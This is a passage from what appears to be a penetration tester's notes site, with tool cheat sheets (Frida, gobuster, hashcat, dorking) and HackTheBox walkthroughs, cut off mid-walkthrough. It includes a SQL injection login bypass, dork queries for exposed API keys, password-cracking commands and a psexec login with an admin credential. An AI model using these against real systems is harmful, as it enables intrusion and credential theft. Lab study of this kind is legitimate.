                        fping -a -g IPRANGE\n# -a: forces the tool to show only alive hosts.\n# -g: tells the tool we want to perform a ping sweep instead of a standard ping.\n

                        Also you can use the CIDR notation:

                        fping -a -g 10.54.12.0/24\nfping -a -g 10.54.12.0 10.54.12.255\n
                        ","tags":["scanning","reconnaissance","ping"]},{"location":"frida/","title":"Frida - A dynamic instrumentation toolkit","text":"

                        Dynamic instrumentation toolkit for developers, reverse-engineers, and security researchers. It lets you inject snippets of JavaScript or your own library into native apps on Windows, macOS, GNU/Linux, iOS, watchOS, tvOS, Android, FreeBSD, and QNX. Frida also provides you with some simple tools built on top of the Frida API. These can be used as-is, tweaked to your needs, or serve as examples of how to use the API. More.

                        ","tags":["mobile pentesting"]},{"location":"frida/#installation-and-set-up","title":"Installation and set up","text":"

                        Download it:

                        pip install frida-tools\npip install frida\nwget https://github.com/frida/frida/releases/download/15.1.14/frida-server-15.1.14-android-x86.xz\n

                        Unzip the file with extension xz:

                        unxz frida-server-15.1.14-android-x86.xz\n

                        Make sure we're connected to the device:

                        adb connect 192.168.156.103:5555\n

                        Upload frida file to the device:

                        adb push frida-server-15.1.14-android-x86 /data/local/tmp/frida-server\n

                        We go to the path where we have stored the file:

                        adb shell\ncd /data/local/temp\n

                        We list contents, see frida-server file, and we change permissions:

                        ls -la\nchmod 777 frida-server\n

                        Now we can run the binary:

                        ./frida-server\n

                        From another terminal we can see processes running on the device:

                        frida-ps U\n
                        ","tags":["mobile pentesting"]},{"location":"frida/#install-burp-certificate-in-frida","title":"Install Burp Certificate in Frida","text":"

                        Our goal is to install it at: /system/etc/security/cacerts. Here we can find stored Authority certificates and it 's the place where we will install Burp certificate.

                        First, we open Burp > Proxy > Options > Proxy Listener and we click on \"Import / Export CA Certificate\". We save it in DER format to a folder accessible from kali. We can give it the name: cacert.der.

                        Second, we convert der format to pem:

                        openssl x509 -inform DER -in cacert.der -out cacert.pem\n

                        Now, we extract the hash that we will use later on to name the certificate.

                        openssl x509 -inform PEM -subject_hash_old -in cacert.pem | head -1\n

                        It returns (for instance): 9a5ba575.

                        Let's change the name to cacert.pem:

                        mv cacert.pem 9a5ba575.0\n

                        To act as root we'll run:

                        adb root\n

                        And to mount again the units:

                        adb remount\n

                        Netx step will be to upload the certificate 9a5ba575.0 to the SD Card:

                        adb push 9a5ba575.0 /sdcard/\n

                        Let's go to that directory and move the file to our preferred location:

                        adb shell\ncd /sdcard\nls -la\nmv 9a5ba575.0 /system/etc/security/cacerts\n

                        Change permissions to the file:

                        chmod 644 /system/etc/security/cacerts/9a5ba575.0\n\nIn Burp now we need a Proxy Listener. We will indicate the Host-Only IP that we have in our kali. For instance: 192.168.156.107. Port: 8080.\n\nAnd in the wifi settings of the virtual device running on GenyMotion (for instance a Galaxy6), we need to indicate this same IP on Host-Only mode from our kali.\n
                        ","tags":["mobile pentesting"]},{"location":"frida/#basic-commands","title":"Basic commands","text":"
                        # Display active processes, and installed\nfrida-ps -Ua\n\n\n# Restaurate class loaders\nJava.perform(function() {\n    var application = Java.use(\"android.com.application\");\n    var classloader;\n    application.attach.overload('android.content.Context').implementation = function(context) {\n        var result = this.attach(context);\n        classloader = context.getClassLoader();\n        Java.classFactory.loader = classloader;\n    return result;\n    }\n})\n\n# Enumerate classes loaded in memory\nJava.perform(function() {\n    Java.enumerateLoadedClasses\n    ({\n        \"onMatch\": function(className) {\n            console.log(className)\n            },\n        \"onComplete\": function(){]\n    })\n})\n\n# Enumerate classes loaded in memory linked to a specific <package>\nJava.enumerateLoadedClasses\n({\n    \"onMatch\": function(className) {\n        if(className.includes(\"<package>\")) {\n            console.log(className);\n        }\n    },\n    \"onComplete\": function(){]\n});\n\n# Android version installed on device\nJava.androidVersion\n\n# Execute a method of an Activity\nJava.choose(\"<Name and path of the activity>\"), {\n    onMatch: function(instance) {\n    // This function will be called for every instance found by frida console.log (Found instance: \"+ instance).\n        instace.<Method name>/<function()>;\n    },\n    onComplete: function(){}\n});\n\n# Save an Activity in a variable\nvar NameofVariable = Java.use(com.android.application.<nameOfActivity>); \n\n# Execute a script js from Frida\nfrida -U com.android.applicationName -l instance.js\n\n# Modify the implementation of a function\nvar activity = Java.use(com.droidhem.basketball.adapters.Game);\nactivity.normalshoot.implementation = function(x,y){\n    //print the original arguments\n    console.log(\"Dentro de normalshoot\");\n    this.score.value += 10000;\n    // in the original code:\n    // this.score += 2;\n}\n
                        ","tags":["mobile pentesting"]},{"location":"gcloud-cli/","title":"gcloud CLI","text":"
                        # Get a list of images \ngcloud compute images list \n\n\n# PROJECT=<PROJECT> # Replace this with your project id \n# ZONE=<zone>   # Replace this with a GCP zone of your choice \n\n# Launch a GCE instance \ngcloud compute instances create gcp-lab1 \\ \n --project=$PROJECT \\ \n --zone=$ZONE \\ \n --machine-type=f1-micro \\ \n --tags=http-server \\ \n --image=ubuntu-1804-bionic-v20190722a \\ \n --image-project=ubuntu-os-cloud \n\n# Get a list of instances\ngcloud compute instances list\n\n# Filter instances by zone \ngcloud compute instances list --zone=<zone>\n\n\n\n# SSH into the VM. This commands create the pair of keys and all ssh infrastructure needed for the connection\ngcloud compute ssh <instance> --zone=<zone-of-instance> \n\n\n# Open port 80 for HTTP access \ngcloud compute firewall-rules create default-allow-http \\ \n --project=$PROJECT \\ \n --direction=INGRESS \\ \n --action=ALLOW \\ \n --rules=tcp:80 \\ \n --source-ranges=0.0.0.0/0 \\ \n --target-tags=http-server \n\n\n# Run these commands within the VM \nsudo apt-get install -y apache2 \nsudo systemctl start apache2 \n\n\n# Access Apache through the public IP \n# Terminate the instance \ngcloud compute instances delete gcp-lab1 --zone $ZONE \n\n\n# Connect to Google Cloud SQL\ngcloud sql connect <nameOfDatabase>\n\n\n ```\n\n\n\n### Add an image to GCP Container Registry\n\nIn GCP Dashboard go yo Container Registry. First time it will be empty. \n\n```bash\n# Run the below commands in Google Cloud Shell \n\ngcloud services enable containerregistry.googleapis.com \n\nexport PROJECT_ID=<PROJECT ID> # Replace this with your GCP Project ID \n\ndocker pull busybox \ndocker images \n
                        cat <<EOF >>Dockerfile \nfrom busybox:latest \nCMD [\"date\"] \nEOF \n
                        # Build your own instance of busybox and name it mybusybox\ndocker build . -t mybusybox \n\n# Tag your image with the convention stated by GCP\ndocker tag mybusybox gcr.io/$PROJECT_ID/mybusybox:latest \n# When listing images with docker images, you will see it renamed.\n\n# Run your image\ndocker run gcr.io/$PROJECT_ID/mybusybox:latest \n
                        # Associate gcp credentials with docker CLI  \ngcloud auth configure-docker \n\n# Take our mybusybox image available in the environment and pushes it to the Container Registry.\ndocker push gcr.io/$PROJECT_ID/mybusybox:latest \n
                        ","tags":["cloud","google cloud platform","gcp"]},{"location":"gcloud-cli/#demo-of-anthos","title":"Demo of Anthos","text":"
                        # Run the below commands in the macOS Terminal \n\nexport PROJECT_ID=<PROJECT ID> # Replace this with your GCP project ID \nexport REGION=<REGION ID> # Replace this with a valid GCP region \n\ngcloud config set project $PROJECT_ID \ngcloud config set compute/region $REGION \n\n# Enable APIs \ngcloud services enable \\ \n container.googleapis.com \\ \n gkeconnect.googleapis.com \\ \n gkehub.googleapis.com \\ \n cloudresourcemanager.googleapis.com \n\n# Launch GKE Cluster \ngcloud container clusters create cloud-cluster \\ \n    --machine-type=n1-standard-1 \\ \n    --num-nodes=1 \n\n# Launch Minikube. Refer to the docs at https://minikube.sigs.k8s.io/docs/  \nminikube start \n\n# Create GCP Service Account \ngcloud iam service-accounts create anthos-hub \n\n# Add IAM Role to Service Account \ngcloud projects add-iam-policy-binding $PROJECT_ID \\ \n --member=\"serviceAccount:anthos-hub@$PROJECT_ID.iam.gserviceaccount.com\" \\ \n --role=\"roles/gkehub.connect\" \n\n# Download the Service Account JSON Key \ngcloud iam service-accounts keys create \"./anthos-hub-svc.json\" \\ \n  --iam-account=\"anthos-hub@$PROJECT_ID.iam.gserviceaccount.com\" \\ \n  --project=$PROJECT_ID \n\n# Register cluster with Anthos \nURI='gcloud container clusters list --filter='name=cloud-cluster' --uri'\n\ngcloud container hub memberships register cloud-cluster \\ \n        --gke-uri=$URI \\ \n        --service-account-key-file=./anthos-hub-svc.json \n\n# List Membership \ngcloud container hub memberships list \n\n# Register Minikube with Anthos \ngcloud container hub memberships register local-cluster \\ \n --service-account-key-file=./anthos-hub-svc.json \\ \n --kubeconfig=~/.kube/config \\ \n --context=minikube \n\n# List Membership \ngcloud container hub memberships list \n\n# Create Kubernetes Role \n\nkubectl config use-context minikube \n
                        cat <<EOF > cloud-console-reader.yaml \nkind: ClusterRole \napiVersion: rbac.authorization.k8s.io/v1 \nmetadata: \n  name: cloud-console-reader \nrules: \n- apiGroups: [\"\"] \n  resources: [\"nodes\", \"persistentvolumes\"] \n  verbs: [\"get\", \"list\", \"watch\"] \n- apiGroups: [\"storage.k8s.io\"] \n  resources: [\"storageclasses\"] \n  verbs: [\"get\", \"list\", \"watch\"] \nEOF \n
                        kubectl apply -f cloud-console-reader.yaml \n\n# Create RoleBinding \nkubectl create serviceaccount local-cluster \n\nkubectl create clusterrolebinding local-cluster-anthos-view \\ \n --clusterrole view \\ \n --serviceaccount default:local-cluster \n\nkubectl create clusterrolebinding cloud-console-reader-binding \\ \n --clusterrole cloud-console-reader \\ \n --serviceaccount default:local-cluster \n\n# Get the Token \nSECRET_NAME=$(kubectl get serviceaccount local-cluster -o jsonpath='{$.secrets[0].name}') \n\n# Copy the secret and paste it in the console \nkubectl get secret ${SECRET_NAME} -o jsonpath='{$.data.token}' | base64 --decode  \n\n# Delete Membership \ngcloud container hub memberships delete cloud-cluster \ngcloud container hub memberships delete local-cluster \n\n# Clean up  \ngcloud container clusters delete cloud-cluster --project=${PROJECT_ID} \ngcloud iam service-accounts delete anthos-hub@${PROJECT_ID}.iam.gserviceaccount.com \nminikube delete \n
                        ","tags":["cloud","google cloud platform","gcp"]},{"location":"git/","title":"Git - A version controller system for programming","text":"

                        Git is\u00a0 a distributed version control system that tracks changes in any set of computer files, usually used for coordinating work among programmers wikipedia

                        "},{"location":"git/#install","title":"Install","text":"

                        From: https://git-scm.com/

                        "},{"location":"git/#git-basic-commands","title":"Git basic commands","text":"

                        Go to your prooject folder and, then, initialize a repo with

                        git init\n

                        Once you do that, you will see a .git folder in your project folder.

                        "},{"location":"git/#git-status","title":"git status","text":"

                        This tells you what it is not still saved in the repository. These are the \"untrack\" files.

                        git status\n
                        "},{"location":"git/#git-add","title":"git add","text":"

                        \"Git add\" add changed files/folders to the repository staging area of the branch. It tracks them. You can add a single file with:

                        git add <file>\n

                        You can also add a folder

                        git add <folder>\n
                        You can add all unstaged files with a dot:

                        git add .\n
                        "},{"location":"git/#git-rm-cached","title":"git rm --cached","text":"

                        You can unstage files from being commited

                        git rm --cached <file>\n
                        "},{"location":"git/#git-commit","title":"git commit","text":"

                        Commit the changes you have staged properly with:

                        git commit -m \"message that describes what you have changed\"\n

                        To undo the most recent commit we've made:

                        git reset --soft HEAD~\n
                        "},{"location":"git/#git-config","title":"git config","text":"

                        To setup user name and user email:

                        git config --global user.name \"NameOfUser\"\ngit config --global user.email \"email@email.com\"\n
                        "},{"location":"git/#git-branch","title":"git branch","text":"

                        To create a new branch:

                        git branch <newBranchName>\n

                        To list all existing branches:

                        git branch\n

                        To switch to a branch:

                        git checkout <destinationBranch>\n

                        To create a new branch and checkout into it in one command:

                        git checkout -b <branchName>\n
                        To delete a branch:

                        git branch <branchName> -d\n

                        If you want to force the deletion (maybe some changes are not staged), then:

                        git branch <branchName> -D\n
                        "},{"location":"git/#git-merge","title":"git merge","text":"

                        Having two branches (main and newbranch), to merge changes contained in newbranch to main branch, go to main branch with \"git checkout main\" and merge the new branch with:

                        git merge <newBranch>\n
                        "},{"location":"git/#git-log","title":"git log","text":"

                        It displays all commits and their commit message. Every commit has an id associated. Yo can use that id for reverting changes.

                        git log\n
                        "},{"location":"git/#git-revert","title":"git revert","text":"

                        It allows us to revert back to a previous version of our project.

                        git revert <commitId>\n
                        "},{"location":"git/#gitignore","title":".gitignore","text":"

                        It's a configuration file that allows you to hide existing files and folders in your repository. Content listed there don't get pushed to a public repository. The file is called .gitignore and has one line per resource to be ignored.

                        Also, important, if a file was staged before you will need to remove it from cache...

                        "},{"location":"git/#git-remove-cached","title":"git remove --cached","text":"

                        To remove from cached files and include it later into the .gitignore file list.

                        git remove --cache <fileName>\n
                        "},{"location":"git/#git-remote","title":"git remote","text":"

                        To check out which remote repository our local repository is connected to:

                        git remote\n

                        To connect my local project folder to the github repo.

                        git remote add origin https://github.com/username/reponame.git\n
                        "},{"location":"git/#git-push","title":"git push","text":"

                        To push our local changes into the connected github repo:

                        git push -u origin main\n
                        Note: origin references the connection, and main is because we are in the main branch (that's what we are pushing). The first git push is a little different from future gitpushes, since we'll need to use the -u gflag in order to set origin as the defaulto remote repository so we won't have to provide its name every time.

                        "},{"location":"git/#some-tricks","title":"Some tricks","text":""},{"location":"git/#counting-commits","title":"Counting commits","text":"

                        git rev-list --count\n
                        If you want to specify a branch name:
                        git rev-list --count <branch>\n

                        "},{"location":"git/#backing-up-untracked-files","title":"Backing-up untracked files","text":"

                        Git, along with some Bash command piping, makes it easy to create a zip archive for your untracked files.

                        $ git ls-files --others --exclude-standard -z |\\\nxargs -0 tar rvf ~/backup-untracked.zip\n

                        "},{"location":"git/#viewing-a-file-of-another-branch","title":"Viewing a file of another branch","text":"

                        Sometimes you want to view the content of the file from another branch. It's possible with a simple Git command, and without actually switching your branch.

                        Suppose you have a file called README.md, and it's in the main branch. You're working on a branch called dev: git show main:README.md

                        git show <branchName>:<fileName>\n

                        "},{"location":"git/#pentesting-git","title":"Pentesting git","text":"

                        Source: https://thecyberpunker.com/tools/git-exposed-pentesting-git-tools/

                        "},{"location":"git/#git-dumper","title":"git-dumper","text":"

                        https://github.com/arthaud/git-dumper

                        "},{"location":"github-dorks/","title":"Github Dorks","text":"

                        Go to github.

                        Github Dowking Query Expected results applicationName api key After getting results, filter by issue and you may find some api keys. It's common to leave api keys exposed when rebasing a git repo, for instance api_key - authorization_bearer - oauth - auth - authentication - client_secret - api_token - client_id - OTP - HOMEBREW_GITHUB_API_TOKEN - SF_USERNAME - HEROKU_API_KEY - JEKYLL_GITHUB_TOKEN - api.forecast.io - password - user_password - user_pass - passcode - client_secret - secret - password hash - user auth - extension: json nasa Results show some extensions that include json, so they might be API related shodan_api_key Results show shodan api keys \"authorization: Bearer\" This search reveal some authorization token. filename: swagger.json Go to Code tab and you will have the swagger file.","tags":["reconnaissance","scanning","osint","dorking"]},{"location":"gobuster/","title":"gobuster","text":"

                        Great tool to brute force directory discovery but it's not recursive (you need to specify a directory to perform a deeper scanner). Also, dictionaries are not API-specific. But here are some commands for Gobuster:

                        gobuster dir -u <exact target url> -w </path/dic.txt> -b 403,4.4 -x .php,.txt -r \n# -b: exclude from results an specific http response`\n# -r: follow redirects\n# -x: add to the path provided by dictionary these extensions\n
                        "},{"location":"gobuster/#enumerate-subdomains","title":"Enumerate subdomains:","text":"

                        From HackTheBox machine - Three:

                        gobuster vhost -w /opt/useful/SecLists/Discovery/DNS/subdomains-top1million-5000.txt -u http://thetoppers.htb\n# vhost : Uses VHOST for brute-forcing\n# -w : Path to the wordlist\n# -u : Specify the URL\n
                        "},{"location":"gobuster/#examples-from-real-life","title":"Examples from real life","text":"
                        gobuster dir -u https://friendzone.red/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt -x txt,php -t 20 -k\n\n# dir to search for directories\n# -t number of concurrent threads\n# -k to avoid error message about certificate: invalid certificate: x509: certificate has expired or is not yet valid\n# -x to indicate an extension for the file\n# -w to indicate a dictionary or wordlist\n\n\n\n# -l Display the length of the response\n# -s Show an especific status code\n# -r Follow redirect\n
                        "},{"location":"google-dorks/","title":"Google Dorks","text":"

                        Google hacking, also named Google dorking, is a hacker technique that uses Google Search and other Google applications to find security holes in the configuration and computer code that websites are using.

                        This is an awesome database with more than 7K googledork entries: https://www.exploit-db.com/google-hacking-database.

                        Google Dorking Query Expected results intitle:\"api\" site: \"example.com\" Finds all publicly available API related content in a given hostname. Another cool example for API versions: inurl:\"/api/v1\" site: \"example.com\" intitle:\"json\" site: \"example.com\" Many APIs use json, so this might be a cool filter inurl:\"/wp-son/wp/v2/users\" Finds all publicly available WordPress API user directories. intitle:\"index.of\" intext:\"api.txt\" Finds publicly available API key files. inurl:\"/api/v1\" intext:\"index of /\" Finds potentially interesting API directories. intitle:\"index of\" api_key OR \"api key\" OR apiKey -pool This is one of my favorite queries. It lists potentially exposed API keys. site:*.domain.com It enumerates subdomains for the given domain \"domain.com\" site:*.domain.com filetype:pdf sales It searches for pdf files named \"sales\" in all subdomains. cache:domain.com/page It will display the google.com cache of that page. inurl:passwd.txt It retrieves pages that contains that in the url.","tags":["reconnaissance","scanning","osint","dorking"]},{"location":"gopherus/","title":"Gopherus - a tool for exploiting SSRF","text":"

                        This tool will help you to generate Gopher payload for exploiting SSRF (Server Side Request Forgery) and gaining RCE (Remote Code Execution)

                        ","tags":["pentesting","web","pentesting","ssrf"]},{"location":"gopherus/#installation","title":"Installation","text":"
                        git clone https://github.com/tarunkant/Gopherus.git\n\ncd Gopherus\nchmod +x install.sh\n
                        ","tags":["pentesting","web","pentesting","ssrf"]},{"location":"grep/","title":"grep","text":"

                        It filters out output

                        # -C return 5 lines up and 5 lines down the line where the criteria is matched\ncat text.txt  | grep -C 5 \"password\"`\n
                        ","tags":["pentesting","reconnaissance"]},{"location":"hashcat/","title":"Hashcat - A password recovery tool","text":"

                        Hashcat is a password recovery tool. It had a proprietary code base until 2015, but was then released as open source software. Versions are available for Linux, OS X, and Windows. Wikipedia

                        ","tags":["pentesting","enumeration","cracking tool"]},{"location":"hashcat/#installation","title":"Installation","text":"

                        Download from: https://hashcat.net/hashcat/.

                        ","tags":["pentesting","enumeration","cracking tool"]},{"location":"hashcat/#basic-commands","title":"Basic commands","text":"
                        # Get help \nhashcat -help \n\n# To crack a hash with a dictionary\nhashcat -m 0 -a 0 -D2 example0.hash example.dict\n# -m:  to specify the module of the algorithm we\u2019ll be running. Then -m 0 specifies an MD5 type of hash\n# -a: type of attack. Then -a 0 is a dictionary attack\n# Results are stored in file hashcat.potfile\n
                        ","tags":["pentesting","enumeration","cracking tool"]},{"location":"hashcat/#modules","title":"Modules","text":"

                        One of the most difficult parts is setting the mode. See https://hashcat.net/wiki/doku.php?id=example_hashes.

                        One common error is:

                        Approaching final keyspace - workload adjusted.           \nSession..........: hashcat                                \nStatus...........: Exhausted\n

                        To fix this, you can use the flag '-w', which is used to set the workload profile. The -w 3 flag specifically sets the workload profile to \"Insane.\"

                        ","tags":["pentesting","enumeration","cracking tool"]},{"location":"hashcat/#rules","title":"Rules","text":"

                        Located at: /usr/share/hashcat/rules/.

                        You can create rules by creating a file called custom.rule and using these commands: https://hashcat.net/wiki/doku.php?id=rule_based_attack.

                        After that use the flag -r to be able to use the rule created:

                        hashcat -m 0 -a 0 -D2 example0.hash example.dict -r rules/custom.rule\n\nS  \n# By clicking s you can check at any time the status\n

                        Generate a mutate password list based on a custom.rule:

                        hashcat --force password.list -r custom.rule --stdout > mutated_password.list\n
                        ","tags":["pentesting","enumeration","cracking tool"]},{"location":"hashcat/#mask-attacks","title":"Mask attacks","text":"

                        These are the possible masks that you can use:

                        ?l = abcdefghijklmnopqrstuvwxyz\n?u = ABCDEFGHIJKLMNOPQRSTUVWXYZ\n?d = 0123456789\n?h = 0123456789abcdef\n?H = 0123456789ABCDEF\n?s = \u00abspace\u00bb!\"#$%&'()*+,-./:;<=>?@[\\]^_`{|}~\n?a = ?l?u?d?s\n?c = Capitalize the first letter and lowercase others\n?sXY = Replace all instances of X with Y.\n?b = 0x00 - 0xff\n?$!     Add the exclamation character at the end.\n

                        Hashcat will apply the rules of custom.rule for each word in password.list and store the mutated version in our mut_password.list accordingly.

                        Example of a mask attack:

                        hashcat -m 0 -a 3 example0.hash ?l?l?l?l?L?l?l?la  \n# first 8 letter will be lowercase and the ninth one will be from the all-character pool\n

                        Hashcat and John come with pre-built rule lists that we can use for our password generating and cracking purposes. One of the most used rules is best64.rule

                        ","tags":["pentesting","enumeration","cracking tool"]},{"location":"hashcat/#cracking-password-of-microsoft-word-file","title":"Cracking Password of Microsoft Word file","text":"
                        cd /root/Desktop/\n/usr/share/john/office2john.py MS_Word_Document.docx > hash\n\ncat hash\n\nMS_Word_Document.docx:$office$*2013*100000*256*16*ff2563844faca58a12fc42c5036f9cf8*ffaf52db903dbcb6ac2db4bab6d343ab*c237403ec97e5f68b7be3324a8633c9ff95e0bb44b1efcf798c70271a54336a2\n\nRemove the first part. Hash would be\n$office$*2013*100000*256*16*ff2563844faca58a12fc42c5036f9cf8*ffaf52db903dbcb6ac2db4bab6d343ab*c237403ec97e5f68b7be3324a8633c9ff95e0bb44b1efcf798c70271a54336a2\n\nhashcat -a 0 -m 9600 --status hash /root/Desktop/wordlists/1000000-password-seclists.txt --force\n# -a 0: dictionary mode\n# -m 9600: Set method to MS Office 2013\n# --status : Enable automatic update of the status screen\n
                        ","tags":["pentesting","enumeration","cracking tool"]},{"location":"hashcat/#resources","title":"Resources","text":"

                        Examples: cracking common hashes: https://infosecwriteups.com/cracking-hashes-with-hashcat-2b21c01c18ec.

                        ","tags":["pentesting","enumeration","cracking tool"]},{"location":"hashcat/#modules-cheatsheet","title":"Modules cheatsheet","text":"

                        https://hashcat.net/wiki/doku.php?id=example_hashes

                        ","tags":["pentesting","enumeration","cracking tool"]},{"location":"hashcat/#mode-7300-ipmi","title":"mode 7300: IPMI","text":"

                        For cracking hashes from IPMI service: In the event of an HP iLO using a factory default password, we can use this Hashcat mask attack command

                        hashcat -m 7300 ipmi.txt -a 3 ?1?1?1?1?1?1?1?1 -1 ?d?u\n
                        ","tags":["pentesting","enumeration","cracking tool"]},{"location":"hashcat/#module-5600","title":"Module 5600","text":"

                        All saved Hashes are located in Responder's logs directory (/usr/share/responder/logs/). We can copy the hash to a file and attempt to crack it using the hashcat module 5600.

                        hashcat -m 5600 hash.txt /usr/share/wordlists/rockyou.txt\n
                        ","tags":["pentesting","enumeration","cracking tool"]},{"location":"hashcat/#mode-1800-unshadow-file","title":"Mode 1800: unshadow file","text":"
                        hashcat -m 1800 -a 0 /tmp/unshadowed.hashes rockyou.txt -o /tmp/unshadowed.cracked\n
                        ","tags":["pentesting","enumeration","cracking tool"]},{"location":"how-to-resolve-run-of-the-mill-connection-problems/","title":"How to resolve run-of-the-mill connection problems","text":"
                        # Check connection\nping 8.8.8.8\n\n# Check domain resolver\nping google.com\n\n# If pinging 8.8.8.8 works but pinging google.com doesn't, check dns file resolver\n    # Add a new line: \n    # nameserver 8.8.8.8\nsudo nano /etc/resolv.conf\n\n# Check wired connections\nsudo service networking\n
                        ","tags":["dns","ping","connection problems"]},{"location":"how-to-resolve-run-of-the-mill-connection-problems/#prevent-etcresolvconf-from-updating","title":"Prevent /etc/resolv.conf from updating","text":"

                        By default, NetworkManager dynamically updates the\u00a0/etc/resolv.conf\u00a0file with the DNS settings from active NetworkManager connection profiles. However, you can disable this behavior and manually configure DNS settings in\u00a0/etc/resolv.conf. Steps:

                        1. As the root user, create the\u00a0/etc/NetworkManager/conf.d/90-dns-none.conf\u00a0file with the following content by using a text editor:

                        [main]\ndns=none\n

                        2. Reload the\u00a0NetworkManager\u00a0service:

                        systemctl reload NetworkManager\n

                        After you reload the service, NetworkManager no longer updates the\u00a0/etc/resolv.conf\u00a0file. However, the last contents of the file are preserved.

                        3. Optionally, remove the\u00a0\"Generated by NetworkManager\" comment from\u00a0/etc/resolv.conf\u00a0to avoid confusion.

                        Verification

                        1. Edit the\u00a0/etc/resolv.conf\u00a0file and manually update the configuration.

                        2. Reload the NetworkManager\u00a0service:

                        systemctl reload NetworkManager\n````   \n\n**3.**  Display the\u00a0/etc/resolv.conf\u00a0file:\n
                        cat /etc/resolv.conf ```

                        If you successfully disabled DNS processing, NetworkManager did not override the manually configured settings.

                        ","tags":["dns","ping","connection problems"]},{"location":"htb-appointment/","title":"Appointment - A HackTheBox machine","text":"
                        nmap -sC -A $ip -Pn\n

                        Only port 80 is open.

                        It's a login panel with an SQL injection vulnerability.

                        To access, enter in username: 1' OR '1'='1';#

                        ","tags":["walkthrough"]},{"location":"htb-archetype/","title":"Archetype - A Hack the Box machine","text":"
                        nmap  -sC -sV $ip -Pn\n

                        Open ports: 135, 139, 445, 1433.

                        First, exploit 445. With smbclient, you will download the fileprod.dtsConfig with credentials for mssql database.

                        With those credentials you can follow instructions from this impacket module and next instructions to exploit it and get a reverse shell with nc64.exe.

                        With that, you will get user.txt in Desktop.

                        For escalation of privileges, see technique Recently accessed files and executed commands.

                        type C:\\Users\\sql_svc\\AppData\\Roaming\\Microsoft\\Windows\\PowerShell\\PSReadline\\ConsoleHost_history.txt\n

                        With admin credentials, you can use impacket's psexec.py module to get an interactive shell on the Windows host with admin rights.

                        python3 /usr/share/doc/python3-impacket/examples/psexec.py administrator:MEGACORP_4dm1n\\!\\!@10.129.95.187\n
                        ","tags":["walkthrough"]},{"location":"htb-bank/","title":"Bank - A HackTheBox machine","text":"

                        The entire exploitation of this machine depends on:

                        • reconnaissance phase: being able to determine that some \"dns digging\" or \"/etc/host\" changes must be done. Also, there is some guessing. You need to assume that bank.htb is a valid domain for a dns transfer... mmm weird.
                        • enumeration phase: using the right dictionary to locate a data breach with password for accessing.

                        Later on, other skills are appreciated, such as reading comments on source code.

                        ","tags":["walkthrough","enumeration","reverse shell","suid binaries"]},{"location":"htb-bank/#users-flag","title":"User's flag","text":"","tags":["walkthrough","enumeration","reverse shell","suid binaries"]},{"location":"htb-bank/#reconnaisance","title":"Reconnaisance","text":"
                        nmap -sV -sC -Pn  -p-\n

                        Results:

                        PORT   STATE SERVICE VERSION\n22/tcp open  ssh     OpenSSH 6.6.1p1 Ubuntu 2ubuntu2.8 (Ubuntu Linux; protocol 2.0)\n| ssh-hostkey: \n|   1024 08eed030d545e459db4d54a8dc5cef15 (DSA)\n|   2048 b8e015482d0df0f17333b78164084a91 (RSA)\n|   256 a04c94d17b6ea8fd07fe11eb88d51665 (ECDSA)\n|_  256 2d794430c8bb5e8f07cf5b72efa16d67 (ED25519)\n53/tcp open  domain  ISC BIND 9.9.5-3ubuntu0.14 (Ubuntu Linux)\n| dns-nsid: \n|_  bind.version: 9.9.5-3ubuntu0.14-Ubuntu\n80/tcp open  http    Apache httpd 2.4.7 ((Ubuntu))\n| http-title: HTB Bank - Login\n|_Requested resource was login.php\n|_http-server-header: Apache/2.4.7 (Ubuntu)\nService Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel\n

                        Let's check UDP connections to port 53:

                        sudo nmap -sU -sC -sV -Pn 10.129.29.200 -p53\n

                        Results:

                        PORT   STATE SERVICE VERSION\n53/udp open  domain  ISC BIND 9.9.5-3ubuntu0.14 (Ubuntu Linux)\n| dns-nsid: \n|_  bind.version: 9.9.5-3ubuntu0.14-Ubuntu\nService Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel\n

                        Open browser and examine http://10.129.29.200 and an Apache web server banner.

                        Since the DNS server is running on port 53 TCP/UDP, we can attempt a zone transfer. However, it is worth noting that guessing bank.thb as a valid zone for this transfer is not a very realistic or scientific approach to penetration testing. Nevertheless, since this is HackTheBox and we are playing this game, let's allow ourselves to go with the flow.

                        Go here for \"digging more into DNS transfer zones\".

                        dig axfr bank.htb @10.129.29.200\n

                        Results:

                        ; <<>> DiG 9.18.12-1-Debian <<>> axfr bank.htb @10.129.29.200\n;; global options: +cmd\nbank.htb.               604800  IN      SOA     bank.htb. chris.bank.htb. 6 604800 86400 2419200 604800\nbank.htb.               604800  IN      NS      ns.bank.htb.\nbank.htb.               604800  IN      A       10.129.29.200\nns.bank.htb.            604800  IN      A       10.129.29.200\nwww.bank.htb.           604800  IN      CNAME   bank.htb.\nbank.htb.               604800  IN      SOA     bank.htb. chris.bank.htb. 6 604800 86400 2419200 604800\n

                        Add those results to /etc/hosts:

                        echo \"10.129.29.200   bank.htb chris.bank.htb ns.bank.htb www.bank.htb\" | sudo tee -a /etc/hosts \n
                        ","tags":["walkthrough","enumeration","reverse shell","suid binaries"]},{"location":"htb-bank/#enumeration","title":"Enumeration","text":"
                        whatweb http://bank.htb\n

                        Results:

                        http://bank.htb [302 Found] Apache[2.4.7], Bootstrap, Cookies[HTBBankAuth], Country[RESERVED][ZZ], HTTPServer[Ubuntu Linux][Apache/2.4.7 (Ubuntu)], IP[10.129.29.200], JQuery, PHP[5.5.9-1ubuntu4.21], RedirectLocation[login.php], Script, X-Powered-By[PHP/5.5.9-1ubuntu4.21]                                                                                                       \nhttp://bank.htb/login.php [200 OK] Apache[2.4.7], Bootstrap, Cookies[HTBBankAuth], Country[RESERVED][ZZ], HTML5, HTTPServer[Ubuntu Linux][Apache/2.4.7 (Ubuntu)], IP[10.129.29.200], JQuery, PHP[5.5.9-1ubuntu4.21], PasswordField[inputPassword], Script, Title[HTB Bank - Login], X-Powered-By[PHP/5.5.9-1ubuntu4.21]\n

                        After browsing the site, reading the source code and trying some SQL injections, let's do some more enumeration.

                        gobuster dir -u http://bank.htb -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt \n

                        Results:

                        /uploads              (Status: 301) [Size: 305] [--> http://bank.htb/uploads/]\n/assets               (Status: 301) [Size: 304] [--> http://bank.htb/assets/]\n/inc                  (Status: 301) [Size: 301] [--> http://bank.htb/inc/]\n/server-status        (Status: 403) [Size: 288]\n/balance-transfer     (Status: 301) [Size: 314] [--> http://bank.htb/balance-transfer/]\n

                        We have a data breach under http://bank.htb/balance-transfer/

                        ","tags":["walkthrough","enumeration","reverse shell","suid binaries"]},{"location":"htb-bank/#exploitation","title":"Exploitation","text":"

